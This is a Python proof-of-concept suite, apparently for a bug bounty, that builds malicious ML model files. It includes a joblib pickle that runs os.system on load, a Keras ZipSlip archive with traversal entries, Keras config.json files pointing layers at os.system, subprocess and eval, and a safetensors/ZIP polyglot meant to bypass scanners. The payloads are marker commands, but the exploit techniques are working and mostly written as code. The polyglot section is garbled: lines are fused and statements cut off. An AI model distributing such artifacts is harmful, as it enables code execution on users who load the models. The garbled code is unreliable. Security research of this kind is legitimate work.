#!/usr/bin/env python3
"""
=============================================================================
Model Format Vulnerability Research - Proof of Concept Suite
Target: Protect AI / huntr bounty program
=============================================================================

This script demonstrates multiple vulnerability classes across AI/ML model
formats. Each PoC is self-contained and generates artifacts + a report.

Vulnerabilities Demonstrated:
1. Joblib Arbitrary Code Execution (ACE) via pickle deserialization
2. Keras 3 (.keras) ZipSlip directory traversal
3. Keras 3 (.keras) ACE via malicious module injection in config.json
4. Safetensors/ZIP Polyglot scanner bypass
5. GGUF integer overflow and OOB read in metadata parsing

Usage:
python submission_poc.py [--generate-only | --test | --report]

Author: Security Researcher
Date: 2026-03-05
=============================================================================
"""

import json
import zipfile
import os
import io
import struct
import sys
import datetime
import hashlib
import argparse

# ---------------------------------------------------------------------------
# Global config
# ---------------------------------------------------------------------------
OUTPUT_DIR = "poc_output"
REPORT_FILE = os.path.join(OUTPUT_DIR, "vulnerability_report.md")


def ensure_output_dir():
    """Create OUTPUT_DIR, including missing parents; do nothing if it exists."""
    os.makedirs(OUTPUT_DIR, exist_ok=True)


def sha256_file(filepath):
    """Return the hexadecimal SHA-256 digest of the file at *filepath*.

    The file is opened in binary mode and consumed in 8192-byte reads, so the
    whole content is never held in memory at once.
    """
    digest = hashlib.sha256()
    with open(filepath, "rb") as stream:
        while True:
            block = stream.read(8192)
            if not block:
                # An empty read marks end-of-file.
                break
            digest.update(block)
    return digest.hexdigest()
# ===========================================================================
# PoC 1: Joblib ACE via Pickle Deserialization
# ===========================================================================
def poc1_joblib_ace():
    """Generate a joblib file that runs a marker command on load, then load it.

    The function writes ``malicious.joblib`` under OUTPUT_DIR, loads it back
    with ``joblib.load`` and reports whether the marker file named in the
    embedded shell command now exists.

    Returns:
        A dict describing the finding (name, file, severity, cvss, success,
        affected, description, impact, reproduction), or ``None`` when joblib
        cannot be imported.
    """
    rule = "=" * 70
    print("\n" + rule)
    print(" PoC 1: Joblib ACE via Pickle Deserialization")
    print(rule)

    try:
        import joblib
    except ImportError:
        print("[!] joblib not installed. Run: pip install joblib")
        return None

    artifact_path = os.path.join(OUTPUT_DIR, "malicious.joblib")
    marker_path = os.path.join(OUTPUT_DIR, "joblib_ace_proof.txt")

    # A marker left by an earlier run would make this run look successful.
    if os.path.exists(marker_path):
        os.remove(marker_path)

    class MaliciousPayload:
        def __reduce__(self):
            # Benign proof only: the command writes a marker file so the
            # execution on load can be observed.
            shell_line = f'echo JOBLIB_ACE_EXECUTED > "{marker_path}"'
            return (os.system, (shell_line,))

    # Generate the artifact.
    joblib.dump(MaliciousPayload(), artifact_path)
    print(f"[+] Created malicious joblib file: {artifact_path}")
    print(f" SHA256: {sha256_file(artifact_path)}")
    print(f" Size: {os.path.getsize(artifact_path)} bytes")

    # Load it back; the result is judged by the marker file, not by the load.
    print("[*] Loading malicious.joblib (triggers ACE)...")
    try:
        joblib.load(artifact_path)
    except Exception as e:
        print(f"[!] Load error: {e}")

    success = os.path.exists(marker_path)
    if not success:
        print("[-] FAILED: Marker file was not created.")
    else:
        with open(marker_path, "r") as marker:
            content = marker.read().strip()
        print(f"[+] SUCCESS: ACE confirmed! Marker file content: '{content}'")

    description = (
        "joblib.load() deserializes Python pickle objects without any "
        "safety checks. An attacker can craft a .joblib file containing "
        "a malicious __reduce__ method that executes arbitrary system "
        "commands when the file is loaded by a victim."
    )
    impact = (
        "Full arbitrary code execution in the context of the user loading "
        "the model. This can lead to data exfiltration, ransomware, "
        "supply chain attacks on ML pipelines, etc."
    )
    reproduction = [
        "1. Run: python submission_poc.py --generate-only",
        f"2. Distribute {artifact_path} as a 'model' file",
        "3. Victim runs: import joblib; joblib.load('malicious.joblib')",
        f"4. Observe {marker_path} created (arbitrary command executed)"
    ]

    return {
        "name": "Joblib ACE via Pickle Deserialization",
        "file": artifact_path,
        "severity": "Critical",
        "cvss": "9.8",
        "success": success,
        "affected": "joblib (all versions)",
        "description": description,
        "impact": impact,
        "reproduction": reproduction
    }
# ===========================================================================
# PoC 2: Keras 3 ZipSlip Directory Traversal
# ===========================================================================
def poc2_keras_zipslip():
    """Generate a ``.keras`` ZIP archive containing ``../`` member names.

    The archive is assembled in memory, written to ``zipslip.keras`` under
    OUTPUT_DIR, then reopened to list which member names contain ``..``.
    Nothing is extracted here; the check only confirms that the traversal
    entries are present in the archive.

    Returns:
        A dict describing the finding (name, file, severity, cvss, success,
        affected, description, impact, reproduction).
    """
    rule = "=" * 70
    print("\n" + rule)
    print(" PoC 2: Keras 3 ZipSlip Directory Traversal")
    print(rule)

    artifact_path = os.path.join(OUTPUT_DIR, "zipslip.keras")

    config = {
        "class_name": "Sequential",
        "config": {"name": "sequential", "layers": []},
        "keras_version": "3.0.0",
        "backend": "tensorflow"
    }

    # Member name -> content, in the order the members are written.
    archive_entries = (
        ('config.json', json.dumps(config)),
        ('metadata.json', json.dumps({
            "keras_version": "3.0.0",
            "backend": "tensorflow"
        })),
        ('model.weights.h5', b''),
        # ZipSlip payload: path traversal entries
        ('../../zipslip_proof.txt',
         'ZipSlip vulnerability: this file was written outside the extraction directory'),
        ('../../../tmp/evil_config.py',
         'import os; os.system("echo ZIPSLIP_ACE")'),
    )

    staging = io.BytesIO()
    with zipfile.ZipFile(staging, 'w') as archive:
        for member_name, member_body in archive_entries:
            archive.writestr(member_name, member_body)

    with open(artifact_path, 'wb') as out:
        out.write(staging.getvalue())

    print(f"[+] Created ZipSlip .keras file: {artifact_path}")
    print(f" SHA256: {sha256_file(artifact_path)}")
    print(f" Size: {os.path.getsize(artifact_path)} bytes")

    # Reopen the file on disk and confirm the traversal names are stored.
    with zipfile.ZipFile(artifact_path, 'r') as archive:
        names = archive.namelist()
        traversal_entries = [member for member in names if '..' in member]
        print(f"[+] ZIP entries: {names}")
        print(f"[+] Traversal entries found: {traversal_entries}")

    success = bool(traversal_entries)
    verdict = 'SUCCESS' if success else 'FAILED'
    print(f"[+] {verdict}: ZipSlip payload embedded")

    description = (
        "Keras 3 .keras files are ZIP archives. If keras.models.load_model() "
        "extracts entries using zipfile.extractall() without sanitizing "
        "file paths, an attacker can include entries with directory traversal "
        "sequences (../../) to write arbitrary files outside the extraction "
        "directory."
    )
    impact = (
        "Arbitrary file write on the victim's filesystem. Can overwrite "
        "configuration files, inject code into Python packages, or place "
        "malicious scripts in autostart locations. Combined with code "
        "injection, this leads to full ACE."
    )
    reproduction = [
        "1. Run: python submission_poc.py --generate-only",
        f"2. Distribute {artifact_path} as a Keras model",
        "3. Victim runs: keras.models.load_model('zipslip.keras')",
        "4. Check if ../../zipslip_proof.txt was created outside extraction dir"
    ]

    return {
        "name": "Keras 3 ZipSlip Directory Traversal",
        "file": artifact_path,
        "severity": "High",
        "cvss": "8.1",
        "success": success,
        "affected": "keras >= 3.0 (if extractall() used without path validation)",
        "description": description,
        "impact": impact,
        "reproduction": reproduction
    }
# ===========================================================================
# PoC 3: Keras 3 ACE via Module Injection
# ===========================================================================
def poc3_keras_module_injection():
    """Generate two ``.keras`` archives whose config.json names non-Keras callables.

    ``module_injection.keras`` lists layers with ``module`` set to ``os`` and
    ``subprocess``; ``eval_injection.keras`` uses ``builtins``/``eval``. Both
    are written under OUTPUT_DIR. The first archive is then reopened to check
    that a layer with ``module == 'os'`` is present. No model is loaded here.

    Returns:
        A dict describing the finding (name, file, severity, cvss, success,
        affected, description, impact, reproduction).
    """
    def _write_keras_archive(destination, model_config):
        # Assemble the three-member archive in memory, then write it to disk.
        staging = io.BytesIO()
        with zipfile.ZipFile(staging, 'w') as archive:
            archive.writestr('config.json', json.dumps(model_config, indent=2))
            archive.writestr('metadata.json', json.dumps({
                "keras_version": "3.0.0",
                "backend": "tensorflow"
            }))
            archive.writestr('model.weights.h5', b'')
        with open(destination, 'wb') as out:
            out.write(staging.getvalue())

    rule = "=" * 70
    print("\n" + rule)
    print(" PoC 3: Keras 3 ACE via Module Injection in config.json")
    print(rule)

    artifact_path = os.path.join(OUTPUT_DIR, "module_injection.keras")

    # Primary variant: layers pointing at os.system and subprocess.call.
    malicious_config = {
        "class_name": "Sequential",
        "config": {
            "name": "malicious_model",
            "layers": [
                {
                    "module": "os",
                    "class_name": "system",
                    "config": {"command": "echo KERAS_ACE_EXECUTED > keras_ace_proof.txt"},
                    "registered_name": "Custom>OSSystem"
                },
                {
                    "module": "subprocess",
                    "class_name": "call",
                    "config": {"args": ["whoami"]},
                    "registered_name": "Custom>SubprocessCall"
                }
            ]
        },
        "keras_version": "3.0.0",
        "backend": "tensorflow"
    }

    # Secondary variant: a single layer pointing at builtins.eval.
    eval_config = {
        "class_name": "Sequential",
        "config": {
            "name": "eval_model",
            "layers": [
                {
                    "module": "builtins",
                    "class_name": "eval",
                    "config": {"expression": "__import__('os').system('whoami')"},
                    "registered_name": None
                }
            ]
        },
        "keras_version": "3.0.0"
    }

    _write_keras_archive(artifact_path, malicious_config)

    eval_path = os.path.join(OUTPUT_DIR, "eval_injection.keras")
    _write_keras_archive(eval_path, eval_config)

    print(f"[+] Created module injection .keras file: {artifact_path}")
    print(f" SHA256: {sha256_file(artifact_path)}")
    print(f"[+] Created eval injection variant: {eval_path}")
    print(f" SHA256: {sha256_file(eval_path)}")

    # Reopen the primary archive and confirm the 'os' layer entry is stored.
    with zipfile.ZipFile(artifact_path, 'r') as archive:
        stored_config = json.loads(archive.read('config.json'))
    stored_layers = stored_config['config']['layers']
    injected = any(layer.get('module') == 'os' for layer in stored_layers)

    verdict = 'SUCCESS' if injected else 'FAILED'
    print(f"[+] {verdict}: Module injection payload embedded")
    print("[*] Note: Exploitation requires keras.models.load_model() with safe_mode=False")
    print("[*] or a safe_mode bypass (e.g., CVE-2025-1550 pattern)")

    description = (
        "Keras 3 .keras files contain a config.json that specifies Python "
        "module paths and class names for model layers. By setting 'module' "
        "to 'os' and 'class_name' to 'system', an attacker can achieve "
        "arbitrary code execution when the model is loaded. While safe_mode=True "
        "should block this, bypasses have been found (CVE-2025-1550) and "
        "many users/tutorials use safe_mode=False."
    )
    impact = (
        "Full arbitrary code execution. The attacker controls which Python "
        "module and function are invoked during model deserialization."
    )
    reproduction = [
        "1. Run: python submission_poc.py --generate-only",
        f"2. Distribute {artifact_path} as a Keras model",
        "3. Victim runs: keras.models.load_model('module_injection.keras', safe_mode=False)",
        "4. Arbitrary code executes during model reconstruction"
    ]

    return {
        "name": "Keras 3 ACE via Module Injection",
        "file": artifact_path,
        "severity": "Critical",
        "cvss": "9.8",
        "success": injected,
        "affected": "keras >= 3.0 (with safe_mode=False or safe_mode bypass)",
        "description": description,
        "impact": impact,
        "reproduction": reproduction
    }
""" print("\n" + "="*70) print(" PoC 4: Safetensors/ZIP Polyglot Scanner Bypass") print("="*70) poc_file = os.path.join(OUTPUT_DIR, "polyglot_bypass.safetensors") # --- Create valid Safetensors data --- # Safetensors format: 8-byte LE header_size + JSON header + tensor data # We create a minimal valid safetensors manually (no torch dependency needed) tensor_data = b'\x00' * 8 # 2 float32 zeros = 8 bytes header = { "__metadata__": {"format": "pt"}, "weight": { "dtype": "F32", "shape": [1, 2], "data_offsets": [0, 8] } } header_json = json.dumps(header).encode('utf-8') header_size = len(header_json) sf_data = struct.pack(" polyglot_proof.txt"} }] }, "keras_version": "3.0.0" } z.writestr('config.json', json.dumps(malicious_config)) z.writestr('metadata.json', json.dumps({"keras_version": "3.0.0"})) z.writestr('model.weights.h5', b'') zip_data = zip_buf.getvalue() # --- Concatenate: Safetensors first, then ZIP --- # Safetensors parsers read from the start (header_size + header + data) # ZIP parsers read from the end (End of Central Directory record) with open(poc_file, 'wb') as f: f.write(sf_data) f.write(zip_data) print(f"[+] Created polyglot file: {poc_file}") print(f" SHA256: {sha256_file(poc_file)}") print(f" Size: {os.path.getsize(poc_file)} bytes") print(f" Safetensors portion: {len(sf_data)} bytes") print(f" ZIP portion: {len(zip_data)} bytes") # --- Verify Safetensors parsing --- sf_valid = False try: with open(poc_file, 'rb') as f: data = f.read() hs = struct.unpack("